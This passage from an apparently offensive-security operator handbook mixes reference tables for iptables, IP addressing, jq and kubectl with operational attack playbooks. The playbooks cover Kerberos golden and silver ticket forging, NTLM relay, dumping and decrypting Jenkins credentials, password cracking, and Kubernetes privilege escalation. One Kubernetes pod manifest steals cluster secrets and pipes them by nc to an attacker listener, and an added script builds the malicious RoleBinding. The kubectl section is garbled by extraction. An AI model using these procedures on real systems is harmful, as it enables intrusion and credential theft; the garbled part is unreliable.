python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Ticket in Linux Usage
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
# (-k uses the ccache, -no-pass suppresses the password prompt; the
# target must be addressed by hostname, not IP, for Kerberos to work)
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver Ticket
# To generate the TGS with the service account's NTLM hash
python [Link] -nthash <service_account_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# To generate the TGS with the service account's AES key
python [Link] -aesKey <service_account_aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands against the service named in the SPN with any
# of the following by using the TGS
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golden Ticket
# To generate the TGT with the krbtgt NTLM hash
python [Link] -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with the krbtgt AES key
python [Link] -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

NTLMRELAY SMB RELAY TO SHELL
# Turn off the SMB server on Responder by editing the
# /etc/responder/[Link] file (SMB = Off), so that ntlmrelayx,
# not Responder, receives the SMB authentication to relay.

echo '[Link]' > [Link]

[Link] -tf [Link] ./[Link]

REFERENCE:
[Link]
[Link]

iOS
RED/BLUE TEAM INFORMATIONAL MOBILE

iOS ARTIFACTS LOCATIONS
Contacts
/var/mobile/Library/AddressBook/[Link]
Calls
/var/mobile/Library/CallHistoryDB/[Link]
SMS
/var/mobile/Library/SMS/[Link]
Maps
/var/mobile/Applications/[Link]/Library/Maps/[Link]
sdata
Safari
/var/mobile/Library/Safari/[Link]
Photos Database
/var/mobile/Media/PhotoData/[Link]
Apple Notes Parser
[Link]

REFERENCE
[Link]
of-ios-13-artifacts/

iOS JAILBREAK
Checkra1n
checkra1n is a community project to provide a high-quality semi-
tethered jailbreak to all, based on the ‘checkm8’ bootrom exploit.
iPhone 5s – iPhone X, iOS 12.3 and up

REFERENCE:
[Link]

PhoenixPwn
Semi-untethered jailbreak for 9.3.5-9.3.6.
All 32-bit devices supported.

REFERENCE
[Link]

iOS APP TESTING
IDB - iOS App Security Assessment Tool.
[Link]

iRET - iOS Reverse Engineering Toolkit.
[Link]

DVIA - Damn Vulnerable iOS App for learning.
[Link]

LibiMobileDevice - A cross-platform protocol library to communicate
with iOS devices.
[Link]

Needle - iOS App Pentesting Tool.
[Link]

AppCritique - iOS App Security Assessment Tool.
[Link]

REFERENCE:
[Link]
[Link]

iOS CRACKED IPA APPS
AppCake
[Link]

IPA Rocks
[Link]

Need to reverse engineer an iOS app? Dump a decrypted IPA first
(works on iOS 11 & 12):
1 Add [Link] src to Cydia
2 Install bfdecrypt
3 Go to bfdecrypt pref pane in Settings & set the app to decrypt
4 Launch it
5 Decrypted IPA is stored in the Documents folder of the app

IPTABLES
ALL CONFIGURATION FIREWALL
iptables is a user-space utility program that allows a system
administrator to configure the tables provided by the Linux kernel
firewall.

CHAINS
INPUT: packets addressed to this host (incoming connections).
OUTPUT: packets originating from this host (outgoing connections).
FORWARD: packets routed through this host that are not addressed to
it; i.e. routing and NATing.

ACTIONS
ACCEPT: Allow the packet.
DROP: Silently discard the packet (the source sees a timeout).
REJECT: Discard the packet and send an error back to the source (an
ICMP unreachable by default, or a TCP reset with --reject-with
tcp-reset).

Flush existing rules:
# iptables -F

Display all active iptables rules:
# iptables -n -L -v --line-numbers

Set default chain policies. Only the built-in targets ACCEPT and DROP
are valid as a policy (REJECT is not). Add the ESTABLISHED,RELATED and
management rules below BEFORE switching INPUT to DROP, or a remote
session will be cut off:
# iptables -P INPUT <DROP/ACCEPT>
# iptables -P OUTPUT <DROP/ACCEPT>
# iptables -P FORWARD <DROP/ACCEPT>

Display rules by chain:
# iptables -L <INPUT/OUTPUT/FORWARD>

Add single IP address inbound <ACCEPT/DROP/REJECT>:
# iptables -A INPUT -s [Link] -j <ACCEPT/DROP/REJECT>

Add single IP address outbound <ACCEPT/DROP/REJECT>:
# iptables -A OUTPUT -d [Link] -j <ACCEPT/DROP/REJECT>

Drop outbound access to a specific site:
# iptables -A OUTPUT -p tcp -d [Link] -j DROP

Delete a specific INPUT rule (the specification must match the rule
exactly as it was added):
# iptables -D INPUT -s [Link] -p tcp --dport 80 -j ACCEPT

Delete a specific OUTPUT rule:
# iptables -D OUTPUT -d [Link] -p tcp --dport 80 -j ACCEPT

Delete by a specific INPUT/OUTPUT/FORWARD rule number:
First show rules by number:
# iptables -n -L -v --line-numbers
Then delete rule:
# iptables -D <INPUT/OUTPUT/FORWARD> 5

Insert a rule in a specific position for inbound (rules are evaluated
top-down and the first match wins, so position matters):
# iptables -I INPUT 3 -s [Link] -j DROP

Insert a rule in a specific position for outbound:
# iptables -I OUTPUT 2 -d [Link] -j ACCEPT

Allow inbound current established connections and related:
# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Allow outbound current established connections:
# iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
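
The individual commands above are easy to get into the wrong order on a
remote box: set `-P INPUT DROP` before the ESTABLISHED,RELATED accept is
in place and the SSH session that typed it dies. The generator below is
an added example, not from the handbook. It emits the whole filter table
in iptables-restore format, in evaluation order (loopback, conntrack,
management SSH, services, rate-limited logging, then the DROP policy),
and checks that ordering, so the table is loaded atomically instead of
rule by rule. The ports and the management network are made up.

```python
"""Generate a lockout-safe default-deny iptables ruleset (iptables-restore format).

Added example; not from the Operator Handbook. iptables evaluates a chain
top-down and the chain policy applies only to packets no rule matched, so
loopback and ESTABLISHED,RELATED accepts must precede everything else and
the SSH allow must exist before INPUT's policy becomes DROP. Loading the
table with iptables-restore applies it atomically. Ports/networks are
constructed.
"""
import ipaddress

ESTABLISHED_RULE = "-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"


def _port(value):
    """Validate a TCP/UDP port number."""
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {value}")
    return port


def _network(value):
    """Validate an IP address or CIDR for a -s match."""
    return str(ipaddress.ip_network(value, strict=False))


def build_ruleset(tcp_ports=(), udp_ports=(), admin_sources=("0.0.0.0/0",),
                  ssh_port=22, allow_ping=True, log_drops=True):
    """Return the *filter table as iptables-restore lines, in the order they are evaluated."""
    lines = [
        "*filter",
        ":INPUT DROP [0:0]",      # policy: applied only after every rule below fails to match
        ":FORWARD DROP [0:0]",    # this host is not a router
        ":OUTPUT ACCEPT [0:0]",
        "-A INPUT -i lo -j ACCEPT",
        ESTABLISHED_RULE,         # replies to our own connections; must precede any DROP
        "-A INPUT -m conntrack --ctstate INVALID -j DROP",
    ]
    if allow_ping:
        lines.append("-A INPUT -p icmp --icmp-type echo-request -j ACCEPT")
    for src in admin_sources:  # management access first, so a later mistake cannot lock you out
        lines.append(f"-A INPUT -p tcp -s {_network(src)} --dport {_port(ssh_port)} "
                     "-m conntrack --ctstate NEW -j ACCEPT")
    for port in tcp_ports:
        lines.append(f"-A INPUT -p tcp --dport {_port(port)} -m conntrack --ctstate NEW -j ACCEPT")
    for port in udp_ports:
        lines.append(f"-A INPUT -p udp --dport {_port(port)} -j ACCEPT")
    if log_drops:  # rate-limited record of what the policy is about to drop
        lines.append('-A INPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-drop: " --log-level 4')
    lines.append("COMMIT")
    return lines


def lockout_safe(lines):
    """True if the ESTABLISHED,RELATED accept precedes every explicit DROP/REJECT rule in INPUT."""
    if ESTABLISHED_RULE not in lines:
        return False
    est = lines.index(ESTABLISHED_RULE)
    for i, rule in enumerate(lines):
        if rule.startswith("-A INPUT") and ("-j DROP" in rule or "-j REJECT" in rule) and i < est:
            return False
    return True


def render(lines):
    """Text ready for: iptables-restore < rules.v4"""
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rules = build_ruleset(tcp_ports=[80, 443], udp_ports=[53], admin_sources=["203.0.113.0/24"])
    assert lockout_safe(rules)
    print(render(rules), end="")
```

Write the output to a file, load it with `iptables-restore < rules.v4`
from a console or a session you can afford to lose, and confirm with
`iptables -n -L -v --line-numbers` that the conntrack rule sits at
position 2 of INPUT before you rely on the DROP policy.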

IPv4
ALL INFORMATIONAL N/A

IPv4 PRIVATE RANGES (RFC 1918)
Class  Block          Mask          Range
A      [Link]/8   [Link]  [Link] - [Link]
B      [Link]/12  [Link]  [Link] - [Link]
C      [Link]/16  [Link]  [Link] - [Link]

IPv4 PUBLIC SUBNET CLASSES
Class  Block          Mask          Range                  Hosts
A      [Link]/8   [Link]  [Link] - [Link]  16,777,214
B      [Link]/16  [Link]  [Link] - [Link]  65,534
C      [Link]/24  [Link]  [Link] - [Link]  254

IPv4 CLASS C SUBNET TABLE


Subnet Addresses Netmask # of Class C
/31 2 [Link] 1/128
/30 4 [Link] 1/64
/29 8 [Link] 1/32
/28 16 [Link] 1/16
/27 32 [Link] 1/8
/26 64 [Link] 1/4
/25 128 [Link] 1/2
/24 256 [Link] 1
/23 512 [Link] 2
/22 1024 [Link] 4
/21 2048 [Link] 8
/20 4096 [Link] 16
/19 8192 [Link] 32
/18 16384 [Link] 64
/17 32768 [Link] 128
/16 65536 [Link] 256
/15 131072 [Link] 512
/14 262144 [Link] 1024
/13 524288 [Link] 2048
/12 1048576 [Link] 4096
/11 2097152 [Link] 8192
/10 4194304 [Link] 16384
/9 8388608 [Link] 32768
/8 16777216 [Link] 65536

IPv6
ALL INFORMATIONAL N/A

WELL-KNOWN MULTICAST ADDRESSES (IPv6 has no broadcast; these groups
take its place)
ff01::2 Interface-Local (Node-Local) Routers
ff02::1 Link-Local All Nodes
ff02::2 Link-Local All Routers
ff05::1 Site-Local Nodes
ff05::2 Site-Local Routers

IPv6 SIZE
Addresses in a prefix = 2^(128 - prefix length); the last column is the
number of /64 networks the prefix contains.
Prefix  Addresses                      # of /64s
/128    1
/127    2
/126    4
/125    8
/124    16
/123    32
/122    64
/121    128
/120    256
/119    512
/118    1,024
/117    2,048
/116    4,096
/115    8,192
/114    16,384
/113    32,768
/112    65,536
/111    131,072
/110    262,144
/109    524,288
/108    1,048,576
/107    2,097,152
/106    4,194,304
/105    8,388,608
/104    16,777,216                     (= one IPv4 /8)
/103    33,554,432
/102    67,108,864
/101    134,217,728
/100    268,435,456
/99     536,870,912
/98     1,073,741,824
/97     2,147,483,648
/96     4,294,967,296                  (= the entire IPv4 Internet)
/95     8,589,934,592
/94     17,179,869,184
/93     34,359,738,368
/92     68,719,476,736
/91     137,438,953,472
/90     274,877,906,944
/89     549,755,813,888
/88     1,099,511,627,776
/87     2,199,023,255,552              1/8,388,608
/86     4,398,046,511,104              1/4,194,304
/85     8,796,093,022,208              1/2,097,152
/84     17,592,186,044,416             1/1,048,576
/83     35,184,372,088,832             1/524,288
/82     70,368,744,177,664             1/262,144
/81     140,737,488,355,328            1/131,072
/80     281,474,976,710,656            1/65,536
/79     562,949,953,421,312            1/32,768
/78     1,125,899,906,842,624          1/16,384
/77     2,251,799,813,685,248          1/8,192
/76     4,503,599,627,370,496          1/4,096
/75     9,007,199,254,740,992          1/2,048
/74     18,014,398,509,481,984         1/1,024
/73     36,028,797,018,963,968         1/512
/72     72,057,594,037,927,936         1/256
/71     144,115,188,075,855,872        1/128
/70     288,230,376,151,711,744        1/64
/69     576,460,752,303,423,488        1/32
/68     1,152,921,504,606,846,976      1/16
/67     2,305,843,009,213,693,952      1/8
/66     4,611,686,018,427,387,904      1/4
/65     9,223,372,036,854,775,808      1/2
/64     18,446,744,073,709,551,616     1 (standard end-user allocation)
/63     2^65                           2
/62     2^66                           4
/61     2^67                           8
/60     2^68                           16
/59     2^69                           32
/58     2^70                           64
/57     2^71                           128
/56     2^72                           256
/55     2^73                           512
/54     2^74                           1,024
/53     2^75                           2,048
/52     2^76                           4,096
/51     2^77                           8,192
/50     2^78                           16,384
/49     2^79                           32,768
/48     2^80                           65,536 (standard business allocation)
/47     2^81                           131,072
/46     2^82                           262,144
/45     2^83                           524,288
/44     2^84                           1,048,576
/43     2^85                           2,097,152
/42     2^86                           4,194,304
/41     2^87                           8,388,608
/40     2^88                           16,777,216
/39     2^89                           33,554,432
/38     2^90                           67,108,864
/37     2^91                           134,217,728
/36     2^92                           268,435,456
/35     2^93                           536,870,912
/34     2^94                           1,073,741,824
/33     2^95                           2,147,483,648
/32     2^96                           4,294,967,296 (standard ISP allocation)
/31     2^97                           8,589,934,592
/30     2^98                           17,179,869,184
/29     2^99                           34,359,738,368
/28     2^100                          68,719,476,736
/27     2^101                          137,438,953,472
/26     2^102                          274,877,906,944
/25     2^103                          549,755,813,888
/24     2^104                          1,099,511,627,776
/23     2^105                          2,199,023,255,552
/22     2^106                          4,398,046,511,104
/21     2^107                          8,796,093,022,208
/20     2^108                          17,592,186,044,416
/19     2^109                          35,184,372,088,832
/18     2^110                          70,368,744,177,664
/17     2^111                          140,737,488,355,328
/16     2^112                          281,474,976,710,656
/15     2^113                          562,949,953,421,312
/14     2^114                          1,125,899,906,842,624
/13     2^115                          2,251,799,813,685,248
/12     2^116                          4,503,599,627,370,496
/11     2^117                          9,007,199,254,740,992
/10     2^118                          18,014,398,509,481,984
/9      2^119                          36,028,797,018,963,968
/8      2^120                          72,057,594,037,927,936

IPv6 BIT MAPPING
Each hex digit is 4 bits; eight 16-bit groups make up the 128-bit
address. The prefix length that ends at each digit:

XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX
group 1:   4   8  12  16
group 2:  20  24  28  32
group 3:  36  40  44  48
group 4:  52  56  60  64
group 5:  68  72  76  80
group 6:  84  88  92  96
group 7: 100 104 108 112
group 8: 116 120 124 128

JENKINS_Exploit
RED TEAM ESCALATE PRIVS DEVOPS

Dump Credentials From Jenkins


SCENARIO: You have obtained credentials for a user with build job
privileges on a Jenkins server. With that user you can dump all the
credentials stored on the Jenkins server and decrypt them by creating
a malicious build job.

STEP 1: Log into the Jenkins server with the obtained user account:
[Link]

STEP 2: Find an obscure location to run your build job and follow
the navigational tree below:
New Item -> Freestyle project

"New Project" -> Configure -> General -> Restrict where this project
can be run -> Enter "master" -> Build -> Add build step -> Execute
shell

STEP 3: Execute the following commands in the shell. The job has to
run on the master: ${JENKINS_HOME}/secrets only exists there, not on
build agents.

echo ""
echo "[Link]"
cat ${JENKINS_HOME}/[Link]
echo ""
echo "[Link]"
cat ${JENKINS_HOME}/secrets/[Link] | base64 -w 0
echo ""
echo "[Link]"
cat ${JENKINS_HOME}/secrets/[Link] | base64 -w 0

STEP 4: Save the build job and on the "Jobs" view page click "Build
Now".
STEP 5: Navigate to "Build History" and click on your build job
number, then click "Console Output".
STEP 6: Copy the text of the "[Link]" and place it into a
local file on your attack workstation named "[Link]".

STEP 7: Copy the base64 encoded "[Link]" and
"[Link]" and decode them into their own files on your
local attack workstation:
echo <base64 string [Link]> | base64 --decode > [Link]
echo <base64 string [Link]> | base64 --decode > [Link]

STEP 8: Download the "jenkins-decrypt" python script:
[Link]

STEP 9: Decrypt the "[Link]" file using "[Link]" and
"[Link]":
[Link] <[Link]> <[Link]> <[Link]>

JOHN THE RIPPER
RED TEAM PASSWORD CRACKING ALL
John the Ripper is a fast password cracker, currently available for
many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS.

ATTACK MODES
DEFAULT ATTACK (no mode given: single crack, then wordlist, then
incremental)
john --format=#type [Link]
DICTIONARY ATTACK
john --format=#type --wordlist=[Link] [Link]
MASK ATTACK
john --format=#type --mask=?l?l?l?l?l?l --min-length=6 [Link]
INCREMENTAL ATTACK
john --format=#type --incremental [Link]
DICTIONARY + RULES ATTACK
john --format=#type --wordlist=[Link] --rules [Link]

RULES
--rules=Single
--rules=Wordlist
--rules=Extra
--rules=Jumbo
--rules=KoreLogic
--rules=All

INCREMENT
--incremental=Digits
--incremental=Lower
--incremental=Alpha
--incremental=Alnum

PARALLEL CPU or GPU
LIST OpenCL DEVICES
john --list=opencl-devices
LIST OpenCL FORMATS
john --list=formats --format=opencl
MULTI-GPU (example 3 GPUs; --dev takes the device numbers to use)
john --format=<OpenCLformat> [Link] --wordlist=[Link] --rules --dev=<#,#,#> --fork=3
MULTI-CPU (example 8 cores; --dev is not needed for CPU formats)
john --wordlist=[Link] [Link] --rules --fork=8

MISC
BENCHMARK TEST
john --test
SESSION NAME
john [Link] --session=example_name
SESSION RESTORE
john --restore=example_name
SHOW CRACKED RESULTS
john [Link] --pot=<john potfile> --show
WORDLIST GENERATION
john --wordlist=[Link] --stdout --external=[filter name] > [Link]

BASIC ATTACK METHODOLOGY
1- DEFAULT ATTACK
john [Link]
2- DICTIONARY + RULES ATTACK
john --wordlist=[Link] --rules [Link]
3- MASK ATTACK
john --mask=?l?l?l?l?l?l --min-length=6 [Link]
4- BRUTEFORCE INCREMENTAL ATTACK
john --incremental [Link]

JQ
ALL INFORMATIONAL N/A

jq - jq is a fantastic command-line JSON processor. jq is a sed-
like tool that is specifically built to deal with JSON.

###EXAMPLE [Link] CONTENTS


{
"name": "Buster",
"breed": "Golden Retriever",
"age": "4",
"owner": {
"name": "Sally"
},
"likes": [
"bones",
"balls",
"dog biscuits"
]
}

Pretty print JSON output
cat [Link] | jq '.'

Find a key and its value
cat [Link] | jq '.name'
#multiple keys can be passed with '.name,.age'

Nested search operation
cat [Link] | jq '.[Link]'

Find items in an array
cat [Link] | jq '.likes[0]'
#multiple array elements '.likes[0:2]'

Combine filters with a pipe (the output of one filter is the input of
the next)
cat [Link] | jq '.owner | .name'
#"Sally"

Transform JSON into new data structures


cat [Link] | jq '[.name, .likes[]]'

Transform Values within JSON


Perform basic arithmetic on number values.
{ "eggs": 2, "cheese": 1, "milk": 1 }
cat [Link] | jq '.eggs + 1'
3

Remove Keys from JSON


cat [Link] | jq 'del(.name)'

Map Values & Perform Operations
echo '[12,14,15]' | jq 'map(.-2)'
[
  10,
  12,
  13
]

REFERENCE:
[Link]
[Link]
[Link]

KUBERNETES
ALL INFORMATIONAL DEVOPS
Kubernetes is an open-source container-orchestration system for
automating application deployment, scaling, and management. It was
originally designed by Google and is now maintained by the Cloud
Native Computing Foundation.

REFERENCE:
[Link]

KUBERNETES_Exploit
RED/BLUE TEAM VULN SCAN DEVOPS

kubeaudit
is a command line tool to audit Kubernetes clusters for various
different security concerns: run the container as a non-root user,
use a read only root filesystem, drop scary capabilities, don't add
new ones, don't run privileged, ...
[Link]

[Link]
Online security risk analysis for Kubernetes resources.
[Link]

kube-bench
is a Go application that checks whether Kubernetes is deployed
securely by running the checks documented in the CIS Kubernetes
Benchmark.
[Link]

katacoda
Online learn Kubernetes using interactive browser-based scenarios.
[Link]

RBAC Configuration
LISTING SECRETS
An attacker that gains the right to list secrets in the cluster can
use the following curl command to get all secrets in the "kube-system"
namespace:
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]

Kubernetes Secrets File Locations
In Kubernetes, secrets such as passwords, API tokens, and SSH keys are
stored in "Secret" objects. Also be on the lookout for volume mount
points where secrets are mounted into the pod's filesystem and
referenced by the pod.

You can query what secrets are stored by issuing:
$ kubectl get secrets
$ kubectl describe secrets/<Name>
$ kubectl get secrets/<Name> -o yaml

To decode a secret username or password (describe hides the values;
get -o yaml shows them base64 encoded, which is encoding, not
encryption) perform the following:
$ echo '<base64_username_string>' | base64 --decode
$ echo '<base64_password_string>' | base64 --decode

POD CREATION
Check your rights with:
kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml
Then create a malicious [Link] file. The pod runs under the
bootstrap-signer service account, reads that account's mounted token,
lists the kube-system secrets through the API and pipes the response
to the attacker's listener:
apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/[Link]/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" [Link]system/secrets; } | nc -nv [Link] 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true
Then:
kubectl apply -f [Link]

PRIVILEGE TO USE PODS/EXEC
kubectl exec -it <POD NAME> -n <PODS NAMESPACE> -- sh

PRIVILEGE TO GET/PATCH ROLEBINDINGS
The purpose of this JSON file is to bind the "admin" ClusterRole to the
compromised service account within the "default" namespace. Note that
roleRef.apiGroup must be exactly "rbac.authorization.k8s.io"; the API
server rejects "*" with a validation error, and every key/comma below
has to be present for the body to parse. Create a malicious
[Link] file:

{
  "apiVersion": "[Link]/v1",
  "kind": "RoleBinding",
  "metadata": {
    "name": "malicious-rolebinding",
    "namespace": "default"
  },
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "admin"
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "sa-comp",
      "namespace": "default"
    }
  ]
}

curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" [Link]aces/default/rolebindings -d @[Link]

Retrieve secrets with the now-privileged token (a plain GET; a POST to
the secrets collection would try to create a secret instead):
curl -k -v -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Accept: application/json" [Link]

IMPERSONATING A PRIVILEGED ACCOUNT
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" [Link]

PRIVILEGED SERVICE ACCOUNT TOKEN
$ cat /run/secrets/[Link]/serviceaccount/token
$ curl -k -v -H "Authorization: Bearer <jwt_token>" [Link]
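
The service account token found at the path above is a JWT whose claims
tell you which namespace and account you are holding, which is exactly
what the RoleBinding body above needs in its subjects and metadata. The
script below is an added example, not code from the handbook or the
Kubernetes project. It decodes the token without verifying the
signature (the API server, not you, is the party that checks it),
handles both legacy secret-based tokens and bound tokens, and builds a
RoleBinding body that passes API validation. The token is constructed
with a bogus signature; the namespace and account names are made up.

```python
"""Decode a Kubernetes service account token and build a valid RoleBinding body.

Added example; not from the Operator Handbook or the Kubernetes project.
Signature is not verified. Claim names are those Kubernetes places in
service account tokens; SAMPLE_TOKEN is constructed with a fake signature.
"""
import base64
import json


def b64url_decode(segment):
    """Base64url without padding, as used in JWT segments."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_unsigned_token(claims):
    """Constructed JWT with a fake signature, only for exercising the decoder."""
    header = b64url_encode(json.dumps({"alg": "RS256", "kid": "fake"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}.bm90LWEtcmVhbC1zaWduYXR1cmU"


def decode_sa_token(token):
    """Return namespace, service account name and raw claims of a SA token (no verification)."""
    try:
        _header, payload, _signature = token.strip().split(".")
    except ValueError:
        raise ValueError("not a three-part JWT") from None
    claims = json.loads(b64url_decode(payload))
    # legacy secret-based tokens carry flat claims
    namespace = claims.get("kubernetes.io/serviceaccount/namespace")
    name = claims.get("kubernetes.io/serviceaccount/service-account.name")
    # bound (projected) tokens nest the same data under "kubernetes.io"
    bound = claims.get("kubernetes.io", {})
    if namespace is None:
        namespace = bound.get("namespace")
    if name is None:
        name = bound.get("serviceaccount", {}).get("name")
    return {"namespace": namespace, "service_account": name, "claims": claims}


def rolebinding_body(name, namespace, service_account, cluster_role="admin"):
    """RoleBinding granting `cluster_role` (a ClusterRole) inside `namespace` to the SA.

    roleRef.apiGroup must be exactly rbac.authorization.k8s.io. A
    RoleBinding to a ClusterRole grants its rules only within the
    binding's namespace; cluster-wide rights need a ClusterRoleBinding.
    """
    return {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "RoleBinding",
        "metadata": {"name": name, "namespace": namespace},
        "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": cluster_role},
        "subjects": [{"kind": "ServiceAccount", "name": service_account, "namespace": namespace}],
    }


def api_paths(namespace):
    """API paths behind the curl commands above, for the namespace the token belongs to."""
    return {
        "secrets": f"/api/v1/namespaces/{namespace}/secrets",
        "pods": f"/api/v1/namespaces/{namespace}/pods",
        "rolebindings": f"/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/rolebindings",
    }


# Constructed legacy-style token for the "sa-comp" account in "default".
SAMPLE_TOKEN = make_unsigned_token({
    "iss": "kubernetes/serviceaccount",
    "kubernetes.io/serviceaccount/namespace": "default",
    "kubernetes.io/serviceaccount/secret.name": "sa-comp-token-abcde",
    "kubernetes.io/serviceaccount/service-account.name": "sa-comp",
    "sub": "system:serviceaccount:default:sa-comp",
})

if __name__ == "__main__":
    info = decode_sa_token(SAMPLE_TOKEN)
    body = rolebinding_body("malicious-rolebinding", info["namespace"], info["service_account"])
    print(json.dumps(body, indent=2))
    print(api_paths(info["namespace"])["rolebindings"])
```

Save the printed body as the rolebinding file and POST it to the
rolebindings path for the same namespace; if the API answers 403 on
that POST, the token lacks the create-rolebindings right this section
assumes, and the impersonation or pod-creation routes are the next
things to try.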

ENUMERABLE ENDPOINTS
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>" [Link]

# List secrets
curl -v -H "Authorization: Bearer <jwt_token>" [Link]

# List deployments
curl -v -H "Authorization: Bearer <jwt_token>" [Link]t/deployments

# List daemonsets
curl -v -H "Authorization: Bearer <jwt_token>" [Link]t/daemonsets

VARIOUS API ENDPOINTS
cAdvisor
curl -k [Link] Address>:4194

Insecure API server (no authentication)
curl -k [Link] Address>:8080

Secure API Server
curl -k [Link] Address>:(8|6)443/swaggerapi
curl -k [Link] Address>:(8|6)443/healthz
curl -k [Link] Address>:(8|6)443/api/v1

etcd API (unauthenticated access here exposes every secret in the
cluster)
curl -k [Link] address>:2379
curl -k [Link] address>:2379/version
etcdctl --endpoints=[Link] get / --prefix --keys-only

Kubelet API
curl -k [Link] address>:10250
curl -k [Link] address>:10250/metrics
curl -k [Link] address>:10250/pods

kubelet (Read only)
curl -k [Link] Address>:10255
[Link]

REFERENCE:
[Link]
[Link]
1/
[Link]

KUBECTL
ALL ADMINISTRATION DEVOPS
Kubectl is a command line tool for controlling Kubernetes clusters.

KUBECTL CONTEXT/CONFIGURE
use multiple
kubeconfig files
at the same time
and view merged
KUBECONFIG=~/.kube/config:~/.kube/kubconfig2 config
Show Merged
kubeconfig
kubectl config view settings.
kubectl config view -o
jsonpath='{.users[?(@.name == get the password
"e2e")].[Link]}' for the e2e user
kubectl config view -o display the first
jsonpath='{.users[].name}' user

112
kubectl config view -o get a list of
jsonpath='{.users[*].name}' users
display list of
kubectl config get-contexts contexts
display the
kubectl config current-context current-context
set the default
context to my-
kubectl config use-context my-cluster-name cluster-name
add a new cluster
kubectl config set-credentials to your kubeconf
kubeuser/[Link] -- that supports
username=kubeuser --password=kubepassword basic auth
permanently save
the namespace for
all subsequent
kubectl config set-context --current -- kubectl commands
namespace=ggckad-s2 in that context.
set a context
kubectl config set-context gce -- utilizing a
user=cluster-admin --namespace=foo && kubectl specific username
config use-context gce and namespace.
kubectl config unset [Link] delete user foo
CREATE OBJECTS
create
kubectl apply -f ./[Link] resource(s)
create from
kubectl apply -f ./[Link] -f ./[Link] multiple files
create
resource(s) in
all manifest
kubectl apply -f ./dir files in dir
create
resource(s) from
kubectl apply -f [Link] url
start a single
kubectl create deployment nginx --image=nginx instance of nginx
get the
documentation for
pod and svc
kubectl explain pods,svc manifests
VIEW/FIND RESOURCES
List all services
kubectl get services in the namespace
List all pods in
kubectl get pods --all-namespaces all namespaces
List all pods in
the current
namespace with
kubectl get pods -o wide more details

113
List a particular
kubectl get deployment my-dep deployment
List all pods in
kubectl get pods the namespace
kubectl get pod my-pod -o yaml Get a pod's YAML
Get a pod's YAML
without cluster
specific
kubectl get pod my-pod -o yaml --export information
# Describe commands with verbose output
kubectl describe nodes my-node
kubectl describe pods my-pod
# List Services
kubectl get services --sort-by=.[Link] Sorted by Name
kubectl get pods --sort- # List pods
by='.[Link][0].restartCount Sorted by Restart
' Count
# List
PersistentVolumes
kubectl get pv --sort- sorted by
by=.[Link] capacity
# Get the version
kubectl get pods --selector=app=cassandra -o label of all pods
jsonpath='{.items[*].[Link]} with label
' app=cassandra
# Get all worker
nodes (use a
selector to
exclude results
that have a label
named 'node-
kubectl get node --selector='!node- [Link].i
[Link]/master' o/master')
# Get all running
kubectl get pods --field- pods in the
selector=[Link]=Running namespace
kubectl get nodes -o
jsonpath='{.items[*].[Link][?(@.typ # Get ExternalIPs
e=="ExternalIP")].address}' of all nodes
kubectl get pods -o json | jq
'.items[].[Link][].env[]?.valueFrom. # List all
[Link]' | grep -v null | sort | Secrets currently
uniq in use by a pod
# List Events
kubectl get events --sort- sorted by
by=.[Link] timestamp
# Compares the
current state of
the cluster
kubectl diff -f ./[Link] against the state

114
